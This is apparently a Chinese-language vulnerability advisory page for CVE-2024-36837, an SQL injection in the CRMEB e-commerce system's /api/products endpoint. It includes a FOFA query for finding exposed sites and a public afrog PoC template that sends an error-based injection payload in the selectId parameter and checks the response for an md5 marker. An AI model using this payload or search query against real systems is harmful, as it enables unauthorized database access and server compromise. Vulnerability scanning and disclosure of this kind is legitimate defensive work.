CVE-2024-36837: CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

日期: 2025-09-01 | 影响软件: CRMEB | POC: 已公开

漏洞描述

fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB" 该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单.

PoC代码[已公开]

id: CVE-2024-36837

info:
  name: CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)
  author: fkalis
  severity: high
  description: |-
    fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
    该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单.
  reference:
    - https://www.seebug.org/vuldb/ssvid-99852
    - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/CVE-2024-36837%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md
  tags: crmeb,sqli,cve,cve2024
  created: 2024/12/25

rules:
  r0:
    request:
      method: GET
      path: /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(123123)))),0x7e),3550)
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    expression: response.status == 200 && response.body.bcontains(b'4297f44b13955235245b2497399d7a93')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-36837.yaml

相关漏洞推荐